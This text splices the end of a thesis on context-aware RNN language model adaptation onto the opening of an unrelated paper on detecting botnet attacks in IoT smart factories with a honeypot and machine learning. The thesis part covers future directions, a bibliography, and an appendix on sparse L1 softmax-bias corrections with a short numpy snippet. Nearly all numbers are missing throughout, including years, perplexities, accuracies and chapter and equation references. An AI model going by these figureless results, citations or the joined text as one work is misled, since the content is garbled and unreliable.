taken together, these indicate the factorcell provides a greater benefit than the improvement in perplexity would suggest. this is likely because the gains are on less frequently used words, and perplexity is dominated by frequent words. we showed how online learning lets the adapted model take advantage of contexts that emerge after training. the method of online adaptation that we introduced in chapter is generic; it will work for multiple adaptation strategies, including the concatcell. however, the factorcell makes better use of the data stream to continue to increase the quality of its predictions over time. we made some observations about what factors make a dataset more or less amenable to adaptation. these include, from chapter , that context variables that are easily predictable from the text alone are unlikely to be helpful and, from chapter , that for topic related contexts adapting the softmax bias may be more successful. we also found that having a larger sized recurrent layer can lessen the impact of adapting the softmax bias. . future directions there are several promising future directions that build on the work in this thesis. in all six tasks that are explored in chapter , all context factors are available for all training and testing samples. in some scenarios, it may be possible for some context factors to be missing. a simple solution for handling this is to use the expected value for the missing variable(s), since this is equivalent to using a weighted combination of the adaptation matrices for the different possible values of the missing variables. the experiment scenarios all used metadata to specify context, since this type of context can be more sensitive to data sparsity and has been less studied. in contrast, in many prior studies of language model adaptation, context is specified in terms of text samples, such as prior user queries, prior sentences in a dialog, other documents related in terms of topic or style, etc. the factorcell framework introduced here is also applicable to this type of context, but the best encoding of the text into an embedding (e.g. using bag of words, sequence models, etc.) is likely to vary with the application and remains an area of study for future work. the generation experiments that we conducted were generating text from scratch with no objective other than to obey the constraints imposed by conditioning on the context. in applications, such as machine translation, the generation is conditioned on a source sequence in an encoder-decoder model (also called sequence-to-sequence, or seq seq) (cho et al., ). the factorcell model is applicable in these situations as well and one future direction is to test how it performs in that setting. prior work has already shown that a simple language model that incorporates contextual data can provide gains in machine translation (drexler et al., ). the data we used consisted of one or two context variables such as latitude and longitude or a hotel identifier and star rating. in these cases, it was reasonable to expect the context embedding to summarize the relevant information from both variables. if there were many more context variables then that assumption may no longer hold. more work is needed to find an appropriate dataset that has multiple context variables and to investigate appropriate methods of providing the context information to the factorcell model. in chapter , we showed that using hashing to adapt the output layer bias benefits per- plexity for high dimensional contexts. 
this indicates that the low-rank adaptation of the bias does not fully model the context-dependent language. we suggested that the model could benefit from a sparse correction to the low-rank adaptation and that could be accom- plished by including an l penalty term to the adaptation parameters. this idea is partially explored in appendix a, but more work is needed to investigate the benefits of sparsity in language model adaptation. our focus was on language modeling, but rnns are widely used in many other natural language processing tasks and in other domains that have little or nothing to do with language such as acoustic modeling (graves et al., ), time-series analysis, music generation (goel et al., ), and more. for example, some work on other natural language processing tasks, such as spoken language understanding, have already made use of the concatcell style adaptation (mesnil et al., ). personalization would be of high utility in these applications. this thesis looked at query completion, but there are often text prediction applications that this work is relevant to, including next word prediction for mobile text input and augmentative communication for people with disabilities. for augmentative communications, the method would also apply to icon-based communication, which relies on a language model with icons instead of words or characters (dudy and bedrick, ). it is difficult to predict what future state-of-the-art language models will look like. re- current neural networks have been reliable winners for the past few years. there is active work on alternate architectures that remedy some of the perceived weaknesses (mostly lack of easy parallelism) of the rnn, such as the quasi-recurrent neural network (bradbury et al., ) and the transformer network (vaswani et al., ). it seems likely that the adaptation techniques from this thesis will apply to those architectures as well, but it remains to be tested. bibliography jimmy lei ba, jamie ryan kiros, and geoffrey e hinton. . layer normalization. arxiv preprint arxiv: . . dzmitry bahdanau, jan chorowski, dmitriy serdyuk, yoshua bengio, et al. . end-to- end attention-based large vocabulary speech recognition. in proc. icassp, pages – . lalit bahl, james baker, paul cohen, fred jelinek, burn lewis, and r mercer. . recog- nition of continuously read natural corpus. in proc. icassp, volume , pages – . ziv bar-yossef and naama kraus. . context-sensitive query auto-completion. in proc. www, pages – . jerome r bellegarda. . exploiting latent semantic information in statistical language modeling. proceedings of the ieee, ( ): – . jerome r bellegarda. . statistical language model adaptation: review and perspectives. speech communication, ( ): – . yoshua bengio, réjean ducharme, pascal vincent, and christian jauvin. a. a neural probabilistic language model. journal of machine learning research, (feb): – . yoshua bengio, jean-sébastien senécal, et al. b. quick training of probabilistic neural nets by importance sampling. in proc. aistats. steven bird, ewan klein, and edward loper. . natural language processing with python. o’reilly media. burton h bloom. . space/time trade-offs in hash coding with allowable errors. com- munications of the acm, ( ): – . samuel r. bowman, luke vilnis, oriol vinyals, andrew dai, rafal jozefowicz, and samy bengio. . generating sentences from a continuous space. in proceedings of the th signll conference on computational natural language learning, pages – . association for computational linguistics. 
james bradbury, stephen merity, caiming xiong, and richard socher. . quasi-recurrent neural networks. proc. iclr. thorsten brants, ashok c popat, peng xu, franz j och, and jeffrey dean. . large language models in machine translation. in proc. emnlp. peter f brown, peter v desouza, robert l mercer, vincent j della pietra, and jenifer c lai. . class-based n-gram models of natural language. computational linguistics, ( ): – . ivan bulyko, mari ostendorf, and andreas stolcke. . getting more mileage from web text sources for conversational speech language modeling using class-dependent mixtures. in proc. hlt-naacl, pages – . fei cai, maarten de rijke, et al. . a survey of query auto-completion in information retrieval. foundations and trends in information retrieval, ( ): – . fei cai, shangsong liang, and maarten de rijke. . time-sensitive personalized query auto-completion. in proc. cikm, pages – . william chan, navdeep jaitly, quoc v le, and oriol vinyals. . listen, attend and spell. arxiv preprint arxiv: . . ciprian chelba and noam shazeer. . sparse non-negative matrix language modeling for geo-annotated query session data. in proc. automatic speech recognition and under- standing (asru), ieee workshop on, pages – . ciprian chelba, xuedong zhang, and keith b hall. . geo-location for voice search language modeling. in proc. interspeech, pages – . wenlin chen, david grangier, and michael auli. . strategies for training large vocab- ulary neural language models. in proc. acl. xie chen, tian tan, xunying liu, pierre lanchantin, moquan wan, mark jf gales, and philip c woodland. . recurrent neural network language model adaptation for multi- genre broadcast speech recognition. in proc. interspeech. kyunghyun cho, bart van merriënboer, caglar gulcehre, dzmitry bahdanau, fethi bougares, holger schwenk, and yoshua bengio. . learning phrase representa- tions using rnn encoder-decoder for statistical machine translation. arxiv preprint arxiv: . . junyoung chung, kyunghyun cho, and yoshua bengio. . a character-level decoder without explicit segmentation for neural machine translation. in proc. acl. mathias creutz, teemu hirsimäki, mikko kurimo, antti puurula, janne pylkkönen, ṽesa siivola, matti varjokallio, ebru arisoy, murat saraçlar, and andreas stolcke. . morph- based speech recognition and modeling of out-of-vocabulary words across languages. acm transactions on speech and language processing (tslp), ( ): . salil deena, madina hasan, mortaza doulaty, oscar saz, and thomas hain. . com- bining feature and model-based adaptation of rnnlms for multi-genre broadcast speech recognition. in proc. interspeech, pages – . renato demori and marcello federico. . language model adaptation. in computational models of speech pattern processing, pages – . adji b dieng, chong wang, jianfeng gao, and john paisley. . topicrnn: a recurrent neural network with long-range semantic dependency. arxiv preprint arxiv: . . jennifer drexler, pushpendre rastogi, jacqueline aguilar, benjamin van durme, and matt post. . a wikipedia-based corpus for contextualized machine translation. in proc. lrec, pages – . shiran dudy and steven bedrick. . compositional language modeling for icon-based augmentative and alternative communication. northwest nlp regional workshop. j. eisenstein, a. ahmed, and e. xing. a. sparse additive generative models of text. in proc. icml. jacob eisenstein, amr ahmed, and eric p. xing. b. sparse additive generative models of text. in proc. icml. 
jacob eisenstein, brendan o’connor, noah a smith, and eric p xing. . a latent variable model for geographic lexical variation. in proc. emnlp, pages – . jessica ficler and yoav goldberg. . controlling linguistic style aspects in neural language generation. in proc. emnlp workshop on stylistic variation. siva reddy gangireddy, pawel swietojanski, peter bell, and steve renals. . unsuper- vised adaptation of recurrent neural network language models. in proc. interspeech, pages – . roberto gemello, franco mana, stefano scanzio, pietro laface, and renato de mori. . linear hidden transformations for adaptation of hybrid ann/hmm models. speech com- munication, ( - ): – . shalini ghosh, oriol vinyals, brian strope, scott roy, tom dean, and larry heck. . contextual lstm models for large scale nlp tasks. arxiv preprint arxiv: . . james r glass, timothy j hazen, d scott cyphers, igor malioutov, david huynh, and regina barzilay. . recent progress in the mit spoken lecture processing project. in proc. interspeech, pages – . kratarth goel, raunaq vohra, and jk sahoo. . polyphonic music generation by mod- eling temporal dependencies using a rnn-dbn. in proc. international conference on artificial neural networks, pages – . ian j goodfellow, mehdi mirza, da xiao, aaron courville, and yoshua bengio. . an empirical investigation of catastrophic forgetting in gradient-based neural networks. arxiv preprint arxiv: . . edouard grave, armand joulin, and nicolas usunier. a. improving neural language models with a continuous cache. in proc. iclr, volume abs/ . . edouard grave, tomáš mikolov, armand joulin, and piotr bojanowski. b. bag of tricks for efficient text classification. in eacl. alex graves, santiago fernández, faustino gomez, and jürgen schmidhuber. . connec- tionist temporal classification: labelling unsegmented sequence data with recurrent neural networks. in proc. icml, pages – . acm. alex graves and navdeep jaitly. . towards end-to-end speech recognition with recurrent neural networks. in proc. icml, volume , pages – . klaus greff, rupesh k srivastava, jan koutńık, bas r steunebrink, and jürgen schmid- huber. . lstm: a search space odyssey. ieee transactions on neural networks and learning systems, : – . david ha, andrew dai, and quoc v le. . hypernetworks. in proc. iclr. yoni halpern, keith hall, vlad schogol, michael riley, brian roark, gleb skobeltsyn, and martin baeuml. . contextual prediction models for speech recognition. in proc. interspeech. bo han, paul cook, and timothy baldwin. . text-based twitter user geolocation pre- diction. j. artif. intell. res., : – . awni hannun, carl case, jared casper, bryan catanzaro, greg diamos, erich elsen, ryan prenger, sanjeev satheesh, shubho sengupta, adam coates, et al. . deep speech: scaling up end-to-end speech recognition. arxiv preprint arxiv: . . cong duy vu hoang, trevor cohn, and gholamreza haffari. . incorporating side infor- mation into recurrent neural network language models. in proc. hlt-naacl. ari holtzman, jan buys, maxwell forbes, antoine bosselut, and yejin choi. . https://openreview.net/forum?id=r lfpfzab learning to write by learning the objective. bo-june paul hsu and james glass. . n-gram weighting: reducing training data mis- match in cross-domain language model estimation. in proc. emnlp, pages – . zhiting hu, zichao yang, xiaodan liang, ruslan salakhutdinov, and eric p xing. . toward controlled generation of text. in proc. icml, pages – . b. hutchinson, m. ostendorf, and m. fazel. . 
a sparse plus low-rank exponential language model for limited resource scenarios. ieee trans. audio, speech and language processing, ( ): – . brian hutchinson, mari ostendorf, and maryam fazel. . exceptions in language as learned by the multi-factor sparse plus low-rank language model. in proc. icassp, pages – . hakan inan, khashayar khosravi, and richard socher. . tying word vectors and word classifiers: a loss framework for language modeling. arxiv preprint arxiv: . . kazuki irie, shankar kumar, michael nirschl, and hank liao. . radmm: recurrent adaptive mixture model with applications to domain robust language modeling. aaron jaech, george mulcaire, shobhit hathi, mari ostendorf, and noah a smith. . hierarchical character-word models for language identification. in emnlp workshop on nlp for social media,. aaron jaech and mari ostendorf. . leveraging twitter for low-resource conversational speech language modeling. arxiv preprint arxiv: . . aaron jaech and mari ostendorf. . http://ajaech.me/adeeehllnorru improving context aware language models. arxiv preprint arxiv: . . aaron jaech and mari ostendorf. a. low-rank rnn adaptation for context-aware lan- guage modeling. tacl. aaron jaech and mari ostendorf. b. personalized language model for query auto- completion. in proc. acl. sébastien jean, kyunghyun cho, roland memisevic, and yoshua bengio. . on using very large target vocabulary for neural machine translation. in proc. acl-ijcnlp. fred jelinek. . self-organized language modeling for speech recognition. readings in speech recognition, pages – . fred jelinek. . up from trigrams. in proc. eurospeech. fred jelinek, bernard mérialdo, salim roukos, and m. strauss. . a dynamic language model for speech recognition. in proc. hlt. yangfeng ji, trevor cohn, lingpeng kong, chris dyer, and jacob eisenstein. . docu- ment context language models. arxiv preprint arxiv: . . mika juuti, bo sun, tatsuya mori, and n asokan. . stay on-topic: generating context- specific fake restaurant reviews. arxiv preprint arxiv: . . andrej karpathy, justin johnson, and li fei-fei. . visualizing and understanding recurrent networks. in proc. iclr. slava katz. . estimation of probabilities from sparse data for the language model component of a speech recognizer. ieee transactions on acoustics, speech, and signal processing, ( ): – . diederik p kingma and jimmy ba. . adam: a method for stochastic optimization. arxiv preprint arxiv: . . katrin kirchhoff and mei yang. . improved language modeling for statistical machine translation. in proc. of the acl workshop on building and using parallel texts, pages – . reinhard kneser and hermann ney. . improved backing-off for m-gram language mod- eling. in proc. icassp, volume , pages – . ben krause, emmanuel kahembwe, iain murray, and steve renals. . dynamic evalua- tion of neural sequence models. arxiv preprint arxiv: . . oleksii kuchaiev and boris ginsburg. . factorization tricks for lstm networks. arxiv preprint arxiv: . . roland kuhn and renato de mori. . a cache-based natural language model for speech recognition. ieee transactions on pattern analysis and machine intelligence, ( ): – . jason lee, kyunghyun cho, and thomas hofmann. . fully character-level neural ma- chine translation without explicit segmentation. tacl, : – . tao lei, yu xin, yuan zhang, regina barzilay, and tommi s. jaakkola. . low-rank tensors for scoring dependency structures. in acl. jiwei li, michel galley, chris brockett, jianfeng gao, and bill dolan. . a persona-based neural conversation model. proc. 
acl. juncen li, robin jia, he he, and percy liang. . delete, retrieve, generate: a simple approach to sentiment and style transfer. arxiv preprint arxiv: . . bing liu and ian lane. . dialog context language modeling with recurrent neural networks. in proc. icassp, pages – . yi luan, yangfeng ji, and mari ostendorf. . lstm based conversation models. arxiv preprint arxiv: . . min ma, michael nirschl, fadi biadsy, and shankar kumar. . approaches for neural- network language model adaptation. in proc. interspeech , pages – . andrew l maas, ziang xie, dan jurafsky, and andrew y ng. . lexicon-free conversa- tional speech recognition with neural networks. in proc. naacl. gábor melis, chris dyer, and phil blunsom. . on the state of the art of evaluation in neural language models. in proc. iclr. gideon mendels, erica cooper, victor soto, julia hirschberg, mark gales, kate knill, anton ragni, and haipeng wang. . improving speech recognition and keyword search for low resource languages using web data. in proc. interspeech. stephen merity, nitish shirish keskar, and richard socher. a. regularizing and opti- mizing lstm language models. arxiv preprint arxiv: . . stephen merity, caiming xiong, james bradbury, and richard socher. b. pointer sen- tinel mixture models. in proc. iclr. grégoire mesnil, yann dauphin, kaisheng yao, yoshua bengio, li deng, dilek hakkani- tur, xiaodong he, larry heck, gokhan tur, dong yu, et al. . using recurrent neural networks for slot filling in spoken language understanding. ieee/acm transactions on audio, speech, and language processing, ( ): – . tomáš mikolov, anoop deoras, daniel povey, lukáš burget, and jan černockỳ. . strate- gies for training large scale neural network language models. in automatic speech recog- nition and understanding (asru), ieee workshop on, pages – . tomáš mikolov, martin karafiát, lukáš burget, jan černockỳ, and sanjeev khudanpur. . recurrent neural network based language model. in proc. interspeech. tomáš mikolov and geoffrey zweig. . context dependent recurrent neural network language model. in proc. slt, pages – . bhaskar mitra and nick craswell. . query auto-completion for rare prefixes. in proc. cikm, pages – . andriy mnih and koray kavukcuoglu. . learning word embeddings efficiently with noise-contrastive estimation. in proc. nips, pages – . giovanni molina, fahad alghamdi, mahmoud ghoneim, abdelati hawwari, nicolas rey- villamizar, mona diab, and thamar solorio. . overview for the second shared task on language identification in code-switched data. in second workshop on computational approaches to code switching, pages – . frederic morin and yoshua bengio. . hierarchical probabilistic neural network language model. in proc. aistats, volume , pages – . graham neubig and chris dyer. . generalizing and hybridizing count-based and neural language models. in proc. emnlp. miles osborne, ashwin lall, and benjamin van durme. . exponential reservoir sampling for streaming language models. proc. acl. robert östling and jörg tiedemann. . continuous multilinguality with language vectors. proc. eacl. ankur p parikh, avneesh saluja, chris dyer, and eric p xing. . language modeling with power low rank ensembles. in proc. emnlp. dae hoon park and rikio chiba. . a neural language model for query auto-completion. in proc. sigir, pages – . razvan pascanu, tomáš mikolov, and yoshua bengio. . on the difficulty of training recurrent neural networks. in proc. icml, pages – . greg pass, abdur chowdhury, and cayley torgeson. . a picture of search. infoscale, : . 
ofir press and lior wolf. . using the output embedding to improve language models. in proc. eacl. alec radford, rafal jozefowicz, and ilya sutskever. . learning to generate reviews and discovering sentiment. arxiv preprint arxiv: . . anton ragni, edgar dakin, xie chen, mark j f gales, and kate m knill. . multi- language neural network language models. in proc. interspeech. ashwin ram, rohit prasad, chandra khatri, anu venkatesh, raefer gabriel, qing liu, jeff nunn, behnam hedayatnia, ming cheng, ashish nagar, et al. . conversational ai: the science behind the alexa prize. in proc. nips. nils reimers and iryna gurevych. . reporting score distributions makes a difference: performance study of lstm-networks for sequence tagging. in proc. emnlp. giuseppe riccardi and allen l gorin. . stochastic language adaptation over time and state in natural spoken dialog systems. ieee transactions on speech and audio process- ing, ( ): – . roni rosenfeld. . optimizing lexical and ngram coverage via judicious use of linguistic data. in proc. eurospeech. roni rosenfeld. . a maximum entropy approach to adaptive statistical language mod- eling. computer, speech and language, : – . roni rosenfeld. . two decades of statistical language modeling: where do we go from here? proceedings of the ieee, ( ): – . murat saraçlar, tunga güngör, et al. . morphology-based and sub-word language mod- eling for turkish speech recognition. in ieee international conference on acoustics, speech and signal processing, pages – . sarah e. schwarm, ivan bulyko, and mari ostendorf. . adaptive language modeling with varied sources to cover new vocabulary items. ieee trans. speech and audio processing, : – . holger schwenk. . efficient training of large neural networks for language modeling. in ieee international joint conference on neural networks, volume , pages – . stanislau semeniuta, aliaksei severyn, and erhardt barth. . recurrent dropout without memory loss. in proc. coling. noam shazeer, joris pelemans, and ciprian chelba. . sparse non-negative matrix lan- guage modeling for skip-grams. in proc. interspeech, pages – . milad shokouhi. . learning to personalize query auto-completion. in proc. sigir, pages – . milad shokouhi and kira radinsky. . time-sensitive query auto-completion. in proc. sigir, pages – . manhung siu and mari ostendorf. . variable n-grams and extensions for conversational speech language modeling. ieee transactions on speech and audio processing, ( ): – . alessandro sordoni, yoshua bengio, hossein vahabi, christina lioma, jakob grue simonsen, and jian-yun nie. . a hierarchical recurrent encoder-decoder for generative context- aware query suggestion. in proc. cikm, pages – . martin sundermeyer, ralf schlüter, and hermann ney. . lstm neural networks for language modeling. in proc. interspeech. david talbot and thorsten brants. . randomized language models via perfect hash functions. in proc. acl. jian tang, yifan yang, sam carton, ming zhang, and qiaozhu mei. . context- aware natural language generation with recurrent neural networks. arxiv preprint arxiv: . . trang tran and mari ostendorf. . characterizing the language of online communities and its relation to community reception. in proc. emnlp. bo-hsiang tseng, hung-yi lee, and lin-shan lee. . personalizing universal recurrent neural network language model with user characteristic features by social network crowd- sourcing. in proc. ieee workshop on automatic speech recognition and understanding (asru), pages – . 
roger cf tucker, michael j carey, and eluned s parris. . automatic language identi- fication using sub-word models. in proc. icassp, volume , pages i– . ashish vaswani, noam shazeer, niki parmar, jakob uszkoreit, llion jones, aidan n gomez, lukasz kaiser, and illia polosukhin. . attention is all you need. in proc. nips, pages – . po-wei wang, j. zico kolter, vijai mohan, and inderjit s. dhillon. . realtime query completion via deep language models. in proc. iclr. tsung-hsien wen, milica gasic, nikola mrksic, pei-hao su, david vandyke, and steve young. . semantically conditioned lstm-based natural language generation for spo- ken dialogue systems. in proc. emnlp. tsung-hsien wen, aaron heidel, hung-yi lee, yu tsao, and lin-shan lee. . recurrent neural network based language model personalization by social network crowdsourcing. in proc. interspeech, pages – . stewart whiting and joemon m jose. . recent and robust query auto-completion. in proc. www, pages – . yonghui wu, mike schuster, zhifeng chen, quoc v le, mohammad norouzi, wolfgang macherey, maxim kr̃ikun, yuan cao, qin gao, klaus macherey, et al. . google’s neural machine translation system: bridging the gap between human and machine trans- lation. arxiv preprint arxiv: . . puyang xu, sanjeev khudanpur, and asela gunawardana. . randomized maximum entropy language models. in proc. automatic speech recognition and understanding (asru), ieee workshop on, pages – . dani yogatama, chris dyer, wang ling, and phil blunsom. . generative and discrimi- native text classification with recurrent neural networks. arxiv preprint arxiv: . . dani yogatama, chong wang, bryan r routledge, noah a smith, and eric p xing. . dynamic language models for streaming text. tacl, : – . wojciech zaremba, ilya sutskever, and oriol vinyals. . recurrent neural network reg- ularization. arxiv preprint arxiv: . . matthew d. zeiler. . adadelta: an adaptive learning rate method. arxiv preprint arxiv: . . weinan zhang, ting liu, yifa wang, and qingfu zhu. . neural personalized response generation as domain adaptation. arxiv preprint arxiv: . . xiang zhang, junbo zhao, and yann lecun. . character-level convolutional networks for text classification. in proc. nips, pages – . arkaitz zubiaga, inaki san vicente, pablo gamallo, josé ramom pichel campos, iñaki alegŕıa loinaz, nora aranberri, aitzol ezeiza, and vı́ctor fresno-fernández. . overview of tweetlid: tweet language identification at sepln . in proc. tweetlid@ sepln, pages – . appendix a sparse corrections for output layer adaptation in chapter , we saw that adapting the output layer using a low rank term combined with a hash table that stored coefficients for individual words was helpful. the low rank term exploits similarities between contexts to boost the probability of words when appropriate. we hypothesized that there may be certain words that are unique to a particular context and are not well modeled by a low rank adaptation. the purpose of the hashed coefficients was to serve as a correction term to the low rank adaptation. in this appendix, we investigate a sparse correction term, where sparsity is achieved by using an l penalty during training, as an alternate method of modeling exceptions to the low rank adaptation. a. sparse plus low-rank softmax bias adaptation we test two methods of forming embeddings for low rank adaptation of the output layer. one is to use a neural network as in equation . to make a single embedding that summarizes all context variables. 
the second method is to learn individual embedding matrices for each of the n context variables. in this case equation . is replaced with

y_t = \mathrm{softmax}\big(E^\top h_t + \sum_{i=1}^{n} G_i c_i + b\big), (a. )

which has individual adaptation terms for each context variable. the sparse correction to the low rank adaptation bias has a similar form except that the low-dimensional context embeddings, c_i, are replaced by one-hot encoded vectors, o_i:

y_t = \mathrm{softmax}\big(E^\top h_t + \sum_{i=1}^{n} G_i c_i + \sum_{i=1}^{n} A_i o_i + b\big), (a. )

the A_i matrices will have a rank equal to the cardinality of the i-th context variable and therefore are much larger than the G_i matrices, whose rank is set by the dimensionality of c_i. to encourage sparsity in the A_i matrices we apply a soft threshold operator:

u(s, \lambda) = \begin{cases} s + \lambda & s < -\lambda \\ 0 & -\lambda \le s \le \lambda \\ s - \lambda & \lambda < s \end{cases} (a. )

this has the identical effect as introducing an l penalty term in the objective except that it sets coefficients to be exactly zero if they are within a certain range. during tuning we search for the optimal penalty term λ_i for each of the four context variables. the soft thresholding operation u(A_i o_i, λ_i) is applied (the function is applied element-wise to each entry in A_i o_i).

we make use of the same tripadvisor data from chapter except that instead of using two context variables (hotel identifier and review sentiment), we have four: hotel identifier, month of stay, year of stay, and region. there are , hotels, years (from to ), months, and regions (major cities in the united states). we hypothesized that the more detailed context would have more specialized language, which might have more potential to benefit from sparse correction. because of the success with the hash table, we hypothesized that sparse terms would be most useful at the output layer. thus, we use no adaptation at the recurrent layer for the following experiments. the vocabulary size is fixed to , words ( % the size of the one used on the same data in chapter ) so that the model can be trained quickly using a full softmax loss. using a sampled softmax loss may interfere with the application of the added regularization term on the softmax bias vector.

we trained models using a random search strategy for hyperparameter tuning. all models used a fixed word embedding and gru dimension of and a batch size of . using a smaller gru dimension, as we did here, places more importance on the softmax layer and gives the adaptation a better chance of having an impact. the hyperparameters that varied between models were the dimensionality of the embeddings of the four context variables, the λ's for each context variable, and whether to use or disable each of the two forms of adaptation.

lr | sparse | ppl
no | no | .
yes | no | .
no | yes | .
yes | yes | .

table a. : perplexity on the validation set of models with no adaptation and varying softmax adaptation strategies. results are not comparable to those in chapter because of a difference in vocabulary size.

for a model that uses no low-rank adaptation, the sparse matrix used to adapt the bias for the region variable contains million parameters, % of the total. this is intended to be over-parameterized so that the regularization will be useful. all of our results are on the validation set and not the test set. as seen in table a. , the best model used a low rank adaptation and no sparse correction. in theory, including the sparse correction should be no worse than without it as long as the λ's are properly tuned.
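as an implementation note, the soft threshold operator in equation (a. ) has a simple element-wise form; the sketch below also shows how it would be applied to the sparse correction term for one context variable. the array names follow equation (a. ), but the code is only an illustration, not the training code used in these experiments.

```python
import numpy as np

def soft_threshold(s, lam):
    # element-wise soft thresholding: values inside [-lam, lam] become exactly zero,
    # values outside are shrunk toward zero by lam (the proximal operator of an l1 penalty)
    return np.sign(s) * np.maximum(np.abs(s) - lam, 0.0)

def sparse_bias_correction(A_i, o_i, lam_i):
    # A_i: (num_values, vocab_size) correction matrix for one context variable
    # o_i: (num_values,) one-hot vector selecting the active value of that variable
    # the product selects the row of corrections for the active context value,
    # and the soft threshold zeroes out entries whose magnitude is below lam_i
    return soft_threshold(o_i @ A_i, lam_i)
```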
the fact that performance was worse for the low-rank case indicates that more experiments are needed for proper tuning. among the models that did use a sparse correction term, we found that the models that worked best had λ’s equal to or so close to zero that the regularization had no effect. there was no apparent benefit to having an l penalty on this data set with this size of model and vocabulary. a second finding is that using separate embeddings for each context variable as in equa- tion a. is better for adapting the softmax layer than combining them using a neural network hidden layer as in equations . and . . the difference was small (perplexities of . ver- sus . ) but consistent. this indicates that the optimization of the context embedding parameters could be improved. in predictive text applications, language models are used to suggest the next words that someone might want to type in order to speed-up the process of typing on a mobile device. the top- next word prediction accuracy as a metric is a better fit to this task than perplexity. we computed the top- accuracy for the language models used in these experiments and found that using the “sparse” adaptation strategy had a bigger impact on the accuracy than perplexity. the best model had a top- accuracy of . % and used both low-rank and sparse adaptation compared to . % for the best model using only low rank adaptation. the difference is small but significant (p < . ). a. l penalty for bias layer fine-tuning we mentioned model fine-tuning as a type of adaptation in section . . . in this section we test if including an l penalty on the bias term is helpful when fine-tuning a pre-trained language model to match the style of a small set of data from another domain. we created small datasets for fine-tuning by selecting the subset of tripadvisor reviews that mention the word “hilton” and those that are for hotels in boston. a third dataset was created by selecting a random subset of (mostly restaurant) reviews from the yelp dataset and then a fourth used only the reviews from the yelp dataset that were for a dentist office. for the pre-trained model, we used the best unadapted tripadvisor model from section a. . the fine-tuning was done by continuing training of that model on the new smaller dataset until it began to over-fit. in a realistic scenario there would not be a large validation set available to check for over-fitting but in this experiment we are just aiming for a proof- of-concept. we tried selectively freezing layers of the pre-trained model and also varied the size of the training data and the scale of the l penalty. in each case the best result was obtained by using zero penalty and early stopping as the only regularizer. it is not actually sparse because the weight on the l regularization term was near zero. a. summary after conducting these experiments we were unable to find a benefit from using an l penalty term to learn a sparse correction to a low-rank model in adapting the softmax bias. there are multiple possible explanations for this negative result. • it is possible that the data we used is not the right one for this technique. if we had used another dataset where the size or vocabulary was different then it is possible that having a sparse correction would be helpful. • our use of random search for tuning the regularization penalties could be improved. we might have seen a different result with better tuning. • we purposefully created a model that was over-parameterized. 
over-parameterization can lead to over-fitting unless regularization is used. using the l penalty is equivalent to setting a laplacian prior distribution on the parameters. the regularization encourages the parameters to not be too far from zero on average. however, even without regularization, the parameter values do not grow too large during any practical length of time. the training data constrains the bias parameter values from becoming too large in the positive direction, and in the negative direction the bias terms for words that are never used in particular contexts do not reach negative infinity because their gradients decrease exponentially faster than the parameters themselves. it turns out that stopping gradient descent after a finite amount of time is a more effective means of regularizing the parameters than applying an l penalty.
• we hypothesized that sparse corrections would be most useful at the softmax layer, but it is possible that they are helpful at the recurrent layer or for adapting the word embeddings.
• we assumed that not adapting the recurrent layer would give the sparse softmax bias adaptation a better chance of success. it is possible this assumption is incorrect and that having a sparse correction is only helpful after the low-rank component has been accounted for by adapting the recurrent layer.
in summary, we did not find a use for l regularization for adapting the softmax bias vector. more work is needed to confirm these experiments and to understand why.

classification of botnet attacks in iot smart factory using honeypot combined with machine learning

seungjin lee, azween abdullah, nz jhanjhi and sh kok
school of computer science & engineering, taylor's university, subang jaya, selangor, malaysia

abstract
the industrial revolution . began with breakthrough technological advances in g, and artificial intelligence has innovatively transformed the manufacturing industry from digitalization and automation to the new era of smart factories. a smart factory not only produces products in a digital and automated system, but is also able to optimize production on its own by integrating production with process management, service distribution, and customized product requirements. a big challenge for the smart factory is to ensure that its network security can counteract cyber attacks such as botnet and distributed denial of service attacks, which are recognized to cause serious interruptions in production and, consequently, economic losses for producers. among many security solutions, botnet detection using honeypot has been shown to be effective in some investigation studies. it is a method of detecting botnet attackers by intentionally creating a resource within the network with the purpose of closely monitoring and acquiring botnet attacking behaviors. for the first time, a proposed botnet detection model was evaluated experimentally by combining honeypot with machine learning to classify botnet attacks. a mimicked smart factory environment was created on an iot device hardware configuration. experimental results showed that the model gave a high accuracy of above %, with a very fast detection time of just . ms and a false positive rate of . , using the random forest algorithm with the weka machine learning program.
hence, the honeypot combined with machine learning model in this study proved highly feasible to apply in the security network of a smart factory to detect botnet attacks.

subjects computer networks and communications, data mining and machine learning, real-time and embedded systems, scientific computing and simulation, security and privacy
keywords smart factory, machine learning, honeypot, botnets detection, iot

introduction
the industrial revolution . has brought great innovation, transforming conventional manufacturing into the new era of smart factories (oztemel & gursev, ). conventional factories involve automation or digitalization within each production process. this, however, makes it very difficult to manage the entire production chain from general to specific levels. more innovatively, a smart factory can effectively manage many processes in the production chain thanks to the use of many internet of things (iot) devices, which are installed and interconnected with each other in every machine or piece of equipment along the production chain. hence, a smart factory is advantageous in producing a variety of products according to customers' desires at better quality and higher productivity. also, iot devices/equipment play a very important role in the operation and management of smart factories. demand for iot equipment in smart factories has been increasing since , as shown in fig. . especially in the last years ( – ), the use of iot devices has increased tremendously from . billion to billion for application in smart factories (smith, ). additionally, as smart factories are combined with information and communications technology (ict), all the facilities and devices are connected through central wireless communication. this allows data to be freely linked between the processes and provides a more systematic, integrated and optimal production environment. efficiency in time management for production can be greatly enhanced at a minimal production cost. therefore, products produced by smart factories become more competitive in the market.

although iot smart factories have been built and operated in the industry, standards of implementation for smart factories have yet to be established (guo et al., ). basically, a smart factory consists of three aspects, that is, interconnection, collaboration and execution, which all contribute to the manufacturing conceptualization of being adaptive and flexible (jiafu et al., ). this concept is reflected in the architecture of the smart factory operating on an iot system, as shown in fig. (chen et al., ).
with four layers arranged hierarchically, it starts at the physical resource layer, followed by the networking layer and the application layer, and ends at the terminal layer. a manufacturing system in the smart factory can be assessed from different layers (li et al., ). with the aim of transforming conventional factories into smart factories, in-depth research needs to look into all layers. from the security perspective, research should focus more on the physical resource/ sensing layer, as it is directly related to the vast usage of the iot devices in order to reinforce the security network for smart factories. finding any security-related issues is one of the priorities required for a smooth system operation by means of resolving any figure demand for iot equipment. the use of iot equipment that is increasing every year. full-size doi: . /peerj-cs. /fig- lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ failover problems arising from the entire manufacturing chain (mittal et al., ). especially, the iot devices are such as radio-frequency identification (rfid), cctvs, programmable logic controller (plc) equipment, sensor and main database servers are installed or located at the physical resource layer. data transmission between these iot devices can be easily affected in case that data leakage in smart factory network occurs. in the worst case, data updates can be abused by unauthorized users (ramos, monge & vidal, ). to mitigate the impact 